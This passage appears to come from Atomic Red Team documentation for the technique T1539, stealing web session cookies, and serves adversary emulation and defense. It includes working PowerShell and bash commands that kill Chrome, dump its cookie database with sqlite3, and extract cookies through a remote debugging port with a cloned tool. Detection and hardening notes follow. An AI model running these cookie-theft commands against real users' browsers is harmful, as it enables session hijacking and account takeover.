remove-item PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt -erroraction silentlycontinue
Invoke-AtomicTest T1539 -TestNumbers 1 -Cleanup

Atomic Test #2 - Steal Chrome Cookies (Windows)#

This test queries Chrome’s SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot’s cookie theft function. Once an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft. Note: If Chrome is running, the process will be killed to ensure that the DB file isn’t locked. See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Dependencies: Run with powershell!#

Description: Sqlite3 must exist at (#{sqlite3_path})#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
Invoke-AtomicTest T1539 -TestNumbers 2 -GetPreReqs

Attack Commands: Run with powershell#

stop-process -name "chrome" -force -erroraction silentlycontinue
"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "$env:localappdata\Google\Chrome\User Data\Default\Network\Cookies" | out-file -filepath "PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt"
Invoke-AtomicTest T1539 -TestNumbers 2

Cleanup:#

remove-item PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt
Invoke-AtomicTest T1539 -TestNumbers 2 -Cleanup

Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)#

The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome’s own mechanisms to access cookies.

If successful, this test will output a list of cookies.

Note: Chrome processes will be killed during this test.

See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e Supported Platforms: macos

Elevation Required (e.g. root or admin)

Dependencies: Run with bash!#

Description: Install Go#
Check Prereq Commands:#
go version
Get Prereq Commands:#
brew install go
Description: Download and compile WhiteChocolateMacademiaNut#
Check Prereq Commands:#
/tmp/WhiteChocolateMacademiaNut/chocolate -h
Get Prereq Commands:#
git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
cd /tmp/WhiteChocolateMacademiaNut
go mod init chocolate
go mod tidy
go build
Invoke-AtomicTest T1539 -TestNumbers 3 -GetPreReqs

Attack Commands: Run with bash#

killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337```
Invoke-AtomicTest T1539 -TestNumbers 3

Cleanup:#

rm -rf /tmp/WhiteChocolateMacademiaNut```
Invoke-AtomicTest T1539 -TestNumbers 3 -Cleanup

Detection#

Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.

Shield Active Defense#

Security Controls#

Alter security controls to make the system more or less vulnerable to attack.

Manipulating security controls involves making configuration changes to the security settings of a system including things like modifying Group Policies, disabling/enabling autorun for removable media, and tightening or relaxing system firewalls, etc.

Opportunity#

There is an opportunity to use security controls to stop or allow an adversary’s activity.

Use Case#

A defender can harden authentication mechanisms to ensure having just a session cookie is not enough to authenticate with another system.

Procedures#

Weaken security controls on a system to allow for leaking of credentials via network connection poisoning. Implement policies on a system to prevent the insecure storage of passwords in the registry. This may force an adversary to revert these changes or find another way to access cached credentials.

previous

T1528 - Steal Application Access Token

next

T1552.001 - Credentials In Files

Contents
  • Atomic Tests
    • Atomic Test #1 - Steal Firefox Cookies (Windows)
      • Dependencies: Run with powershell!
        • Description: Sqlite3 must exist at (#{sqlite3_path})
        • Check Prereq Commands:
        • Get Prereq Commands:
      • Attack Commands: Run with powershell
      • Cleanup:
    • Atomic Test #2 - Steal Chrome Cookies (Windows)
      • Dependencies: Run with powershell!
        • Description: Sqlite3 must exist at (#{sqlite3_path})
        • Check Prereq Commands:
        • Get Prereq Commands:
      • Attack Commands: Run with powershell
      • Cleanup:
    • Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)
      • Dependencies: Run with bash!
        • Description: Install Go
        • Check Prereq Commands:
        • Get Prereq Commands:
        • Description: Download and compile WhiteChocolateMacademiaNut
        • Check Prereq Commands:
        • Get Prereq Commands:
      • Attack Commands: Run with bash
      • Cleanup:
  • Detection
  • Shield Active Defense
    • Security Controls
      • Opportunity
      • Use Case
      • Procedures

By The Jupyter Book community

© Copyright 2022.